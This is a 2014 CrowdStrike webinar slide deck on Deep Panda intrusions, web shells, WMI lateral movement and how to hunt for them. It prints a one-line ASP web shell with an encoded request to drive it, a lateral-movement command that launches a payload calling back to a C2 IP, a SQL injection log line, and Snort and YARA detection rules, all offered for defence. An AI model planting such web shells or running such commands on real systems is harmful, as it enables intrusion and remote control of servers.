crowdcasts monthly: going beyond the indicator

Going Beyond the Indicator

Agenda

• Introductions

• Typical Attacker TTPs

• Case Studies

• New Tactics Explained

• Hunting and Detecting

• Best Practice Preparations

• Resources / Q & A

© 2014 CrowdStrike, Inc. All rights reserved. 2

@CROWDSTRIKE | #CROWDCASTS

Today’s Speakers

Stroz Friedberg, AT&T, The Aerospace Corporation, CERT/CC

Incident Response, Forensic Analysis, and Risk Assessments

DANNY LUNGSTROM


PRIOR TO CROWDSTRIKE

8+ YEARS


LinkedIn: Danny Lungstrom

CONNECT

Today’s Speakers

KPMG LLP. (Information Protection and Business Resiliency)

Performing Security Assessments, Auditing and Remediating Environments, and Developing Security Programs/Strategies

JUSTIN J. WEISSERT



CONNECT

7+ YEARS


LinkedIn: Justin Weissert

Twitter: @JJWeissert

Today’s Speakers

RSA NetWitness, Mandiant, Beckman Coulter

LinkedIn: Ryan Jafarkhani

Twitter: @rj_jafar

Auditing, Conducting Incident Response Investigations, Network Forensics, Computer Forensics and Malware Analysis



CONNECT

5+ YEARS


RYAN JAFARKHANI

6

WHO IS

?

CrowdStrike is a global provider of security technologies and services focused on identifying advanced threats and targeted attacks. Using big-data technologies, CrowdStrike’s next-generation threat protection platform enables enterprises to identify unknown malware, detect zero-day threats, pinpoint advanced adversaries, and provide attribution.

© 2014 CrowdStrike, Inc. All rights reserved.

7

WHAT DO WE DO?

TECHNOLOGY

ENDPOINT THREAT DETECTION & RESPONSE

CONTINUOUS ENDPOINT ACTIVITY MONITORING & REAL-TIME FORENSICS

SERVICES PROACTIVE & INCIDENT RESPONSE SERVICES

INTELLIGENCE CYBER THREAT INTELLIGENCE & ATTRIBUTION

© 2014 CrowdStrike, Inc. All rights reserved.

About CrowdStrike Services

Incident Response Investigations

Proactive Threat Assessments

IR Program Development

Average of Ten Years IR Industry Experience

Backgrounds in IR Consulting, Government, and Defense

Specialists in Broad Range of Technologies

Finance, Technology, Manufacturing, Retail, Healthcare, Telecommunications, Oil & Gas, Entertainment


COMPREHENSIVE OFFERINGS

INDUSTRY VETERANS

VARIETY OF CUSTOMER VERTICALS


WHO ADVERSARY

WHY INTENT

WHAT MALWARE

INDUSTRY

And there are a lot of adversaries


Adversary groups our Intelligence team tracks…

Commercial, Government, Non-profit

Financial, Technology, Communications

Defense & Aerospace, Industrial Engineering, NGOs

Financial Sector

Dissident groups

Electronics & Communications

G20, NGOs, Dissident Groups

CHINA IRAN

Energy Companies

INDIA

Government, Legal, Financial, Media, Telecom

RUSSIA

Oil and Gas Companies

Financial Sector

Crime Syndicates


10

TYPICAL ATTACKER TTPS

2014 Crowdstrike, Inc. All rights reserved.

Typical - Attacker TTPs

• Initial Attack Vector

• Malware

– Persistence Mechanism

– Command & Control

– Functionality

• Lateral Movement

• Data Extraction/Theft

2014 CrowdStrike, Inc. All rights reserved. 11

Shift in Attacker TTPs


Attacker TTP Historical Trends Current Trends

Initial Attack Vector

Spearphish and Vulnerable External Facing Applications (Most Common) No Significant Change

Malware – Persistence Mechanism

Installed as Service, Run Key, Etc. No Persistence

Malware – Command & Control

Beacon to Malicious IP or Domain No Standard Beacon Activity

Malware – Functionality

Simple – Provides Shell or Basic Upload/Download Functionality

Robust – Includes All Required Functionality and Commands

Malware – Location Written to Disk Memory-Resident

Shift in Attacker TTPs (Cont.)


Attacker TTP Historical Trends Current Trends

Lateral Movement Net Use, RDP or Utilities (e.g. PSExec) WMI, Service Accounts

Obfuscation Timestomp Standard Times (Windows API)

Timestomp Both Standard and File Times (Windows API and MFT)

Data Extraction Compress Data and Send to Compromised Host Provider No Significant Change

Last Hop Communication

Source Country IPs (Most Often Chinese, Russian, Iranian)

North American IPs, Anonymous VPN Solutions, Cloud

Catalyst for Change


• Shifts in Tactics

– Increased Intel Sharing

• Whitepapers

•  Blog Posts

• Conference Demos

• VirusTotal

• US Government JIB (Joint Indicator Bulletin)

Pros Cons

•  Increased awareness / detection for public companies

•  Decreased Intel gap for smaller organizations

•  Increased costs for attackers to change TTPs

•  Indicators become less effective as attackers shift TTPs (e.g. new malware, C2 infrastructure)

•  Attacks become more advanced to avoid current methods of detection

•  Reduces visibility into what attacker is doing and/or targeting

15

CASE STUDIES


Case Studies - Background

• Company #1

– Company compromised in 2012 using historical TTPs

– Partial Remediation February 2013

– Re-Compromise March 2013 with new TTPs

• Company #2

– Compromised March 2013

– New TTPs from Company 1 re-compromise were observed


Timeline



February 2013 March 2013 April 2013

Company #1 Investigation Commences

Traditional

Tactics

Intel Community Shares

TTPs Shared

Widely

Company #1 Partial

Remediation

Logging & Monitoring Old

Tactics

Company #2 Investigation Commences

New Tactics

Company #1 Re-compromised

New Tactics

18

NEW TACTICS EXPLAINED


Deep Panda – Simple Web Shell

• 28 byte web shell

•  Active Server Page file

–  Expected input is VBScript code (encoded as ASCII hex)

•  The execute() function executes any VBScript passed to it

–  Upload / download files

–  Execute arbitrary commands (including WMI)

–  Full access to file system

•  Controlled by an attacker “thick client”

2014 Crowdstrike, Inc. All rights reserved. 19

<%execute request(chr(42))%>

Deep Panda – Simple Web Shell


As a simple example of an encoded command, the following GET request would cause the backdoor to execute the code Response.Write(“<h1>Hello World</h1>”) and would render “Hello World” to be printed in the web browser:

http://<webserver>/showimage.asp?*=%52%65%73%70%6F%6E%73%65%2E%57%72%69%74%65%28%22%3C%68%31%3E%48%65%6C%6C%6F%20%57%6F%72%6C%64%3C%2F%68%31%3E%22%29

Deep Panda – Complex Web Shell


•  Ability to impersonate a user (with valid credentials)

•  Eight different commands

–  File system, SQL server, and Active Directory requests

–  Upload / download files

–  Compile and execute any C# code

Web Shell Authentication

• Rudimentary (but effective) authentication for incoming connections

– Requires the presence of a cookie named ‘zWiz’

– or HTTP header Keep-Alive = 320

– or language header containing es-DN (invalid language)

• Prevents identification via search engine indexing or vulnerability scanning


Web Shells – But Why?

•  Primary foothold back into victim organization

•  Less reliant on malware installed on systems, beaconing to a C2


• Why?

–  Low to virtually no detection by antivirus products

–  The absence of command and control beacon traffic

–  Impossible to block known malicious IP addresses to a web server since adversary can easily change their source IP address

–  Cookie and HTTP header authentication aware web shells avoid being enumerated by search engines and restrict access, further reducing their network footprint

Second Stage Malware


C2 Infrastructure

- Execution using Web Shell -  Lateral Movement -  Data theft

Upload Malware Access

Web Shell

Adversary

Web Server Anonymous VPN or Proxy

Why? No Command and Control Beacon activity Change IP/Domain on the fly Runs in memory

Limits forensic artifacts

Lateral Movement


Web Server

System32\cmd.exe - c:\bad.exe /f wmi /s Host2 /u Host2\Administrator /p ”P@ssW0rd" /m call /q "Win32_Process" /c Create – CommandLine:C:\bad.exe /f sh /s 59.111.22.222 /p 443"

Host 2

C2 Infrastructure 59.111.22.222

Anonymous VPN or Proxy

Adversary

Access Web Shell

Leverage WMI Custom VB script “PsExec” Utility

4kb script to remotely launch process as a specified user Cscript.exe – Username Password Remote Host Process path

Why WMI? Evades most typical logging

Shows up as WMI Service Powerful functionality, built into Windows

26

HUNTING AND DETECTING


Go Beyond the Indicator

• New evil requires new approaches for detection

• Look through multiple haystacks for a single needle

– The evil stands out with the right methodology

• Blog series

– Mo’ Shells Mo’ Problems


http://www.crowdstrike.com/blog/

Hunting – WMI Activity


• Windows XP and Server 2003 Had Limited Logging

– %systemroot%\system32\wbem\logs

• Windows 7 and Server 2008 Do NOT Log

– Help investigators help you – enable ahead of time!

•  Wevtutil.exe sl Microsoft-‐Windows-‐WMI-‐Activity/Trace /e:true – Review WMITracing.log via Event Viewer

• Be Familiar with Your Environment’s Use of WMI

Hunting Web Shells – Identifying Intrusion Points

• Web shells are often one of the earliest stages of malware

• Search for activity on the system near the first known compromise time

– Successful web scans in logs

– SQL injection

– Dropper malware

– Lateral movement from other compromised systems

– Pages created or modified within the webserver document root


2013-08-25 13:03:53 GET item-details.aspx id=1%27%20or%201=@@version-- - 80 - <redacted IP>

Hunting Web Shells – File Stacking

• File stacking is based on the concept of least frequency of occurrence

• Collect files from all of your webservers and investigate outliers

– What files do not exist on other web servers?

– PHP|JSP|ASP|ASPX|CFM


Hunting Web Shells – Web Log Review

• Perform statistical analysis of page requests and search for outliers

– See exactly when the web shells were in use via the web logs


Hunting Web Shells – Network Monitoring

• Stack Web Requests from Network Data

• Leverage Cyber Intelligence Feeds to Detect Known Web Shells

– Unique header attributes

– HTML used to produce the shell


alert tcp $EXTERNAL_NET any -‐> $WEB_SERVERS $HTTP_PORTS (msg: "CrowdStrike Deep Panda CSharp Webshell Headers"; content: "Keep-‐Alive: 320"; http_raw_header; content: "es-‐DN"; http_raw_header; flow: established, to_server; classtype: trojan-‐activity; metadata: service http; sid: xxx; rev: xxx; )

Hunting – Memory Resident Malware


• “Fileless” Forensics Fun

• Persistence, We Don’t Need No Stinkin’ Persistence

• New Approach to Malware Means New Approach to Forensics

• Hidden, Not Invisible

• What’s Normal and What’s New?

– Get to know your systems

– Image memory, review, rinse and repeat

Hunting with YARA

• YARA signatures can be used to search your enterprise for specific patterns on disk and in memory


rule CrowdStrike_13091_01 : deep_panda alice RAT { meta: description = "Detection of Mad Hatter .NET RAT" last_modified = "2013-10-08" version = "1.1" in_the_wild = true copyright = "CrowdStrike, Inc" report = "CSIT-13091" strings: $marker1 = "alice'srabbithole" wide $marker2 = "{{\"Version\":{0},\"HostName\":\"{1}\",\"osVersion\":\"{2}\",\"tm\":\ "{3}\",\"tz\":{4}}}" wide $marker3 = "InstManager.pdb" $marker4 = "<osVersion>" $marker5 = "<tm>" $marker6 = "<tz>" condition: uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and 2 of ($marker*) }

CrowdResponse

• Free CrowdStrike Community Tool

• Collect and Analyze Artifacts Across Your Enterprise

• Available Modules

– DirList

– YARA

– PSList

• Many Modules Coming Soon


http://www.crowdstrike.com/community-tools/

36

BEST PRACTICE PREPARATIONS


Best Practices

• Proactive Defense of Your Network

– Isolate Critical Assets with Network Segmentation

– Consolidate and Monitor Internet Egress Points

– Implement Centralized Logging

– Patch, Patch, and Patch Again

– Secure Web Applications and Internal Software Projects

– Minimize or Remove Local Admin Privileges

– Implement a Tiered Active Directory Admin Model

– Incorporate Cyber Intelligence Feeds


CrowdStrike Can Help!

• Services to Consider

– Tabletop Assessments (Yearly at Least)

•  Keep your team primed and educated on latest attack vectors

– Next-Gen Penetration Testing

• More than just a cursory glance, take a real-world scenario approach

– Incident Response, Disaster Recovery and Business Continuity Plans • CrowdStrike knowledge and experience can help you improve/build plans

– Incident Response Services Retainer

• Avoid paperwork related time delays

• CrowdStrike Intelligence Subscription

– Stay Up To Date with Latest Attacker TTPs


39

CROWDSTRIKE RESOURCES


CrowdStrike Global Threat Report

• Adversary activity analysis and predictions

• Look back at 2013

• Predictive trends for 2014

• Threat actor profiles and TTPs

• Get it on crowdstrike.com


INCIDENT RESPONSE SERVICES

PROACTIVE RESPONSE SERVICES

CROWDSTRIKE SERVICES



CrowdStrike Services

INTELLIGENCE TECHNOLOGY





Counter Threat Assessment IR Program Development Next-Gen Pen Testing Tabletop Assessment InfoSec Capability Maturing Model Adversary Assessments


Computer Forensic Analysis Litigation Support Expert Witness Testimony Remediation Malware Analysis

Government-quality intelligence developed using an ‘all-source model’ Detailed technical and strategic analysis of 50+ adversaries’ capabilities, indicators and tradecraft, attribution and intentions Customizable feeds and API for indicators of compromise Indicators can be integrated into current firewall, IDS/IPS, or SIEM solutions to provide real-time attribution Tailored Intelligence feature provides visibility into breaking events that matter an organization’s brand, infrastructure, and customers

Falcon Intelligence: Threat Intelligence Subscription

2

3

4

1

5


Falcon Host: Endpoint Threat Detection & Response

Identifies unknown malware & detects zero-day threats Captures and correlates system events to identify adversary activity in real-time Maximum visibility across the full kill chain allows for insight into past & current attacks Context-based detection does not rely on signatures or easily changed IOCs Intelligence integration provides full attribution to identify context, motivation, and actor behind an attack

2

3

4

1

5


Falcon Host: Continuous Endpoint Activity Monitoring

Explore rich execution data collected by the Falcon Host sensors Dashboards provide an at-a-glance view of recent activity for investigative purposes Expert-designed menu of queries provide the ability to proactively hunt for malicious activity

2

3

1



Q & A

NEXT



Topic: Operationalizing Intelligence

Adam Meyers – Director, Intelligence

Elia Zaitsev – Senior Sales Engineer

April 29th | 2PM ET/11AM PT

Q&A

crowdcasts monthly: going beyond the indicator

Technology

crowdcasts linkedin

malware industry

certcc incident response

crowdcasts ryan jafarkhani

security assessments

malware analysis

prot financial

adversary groups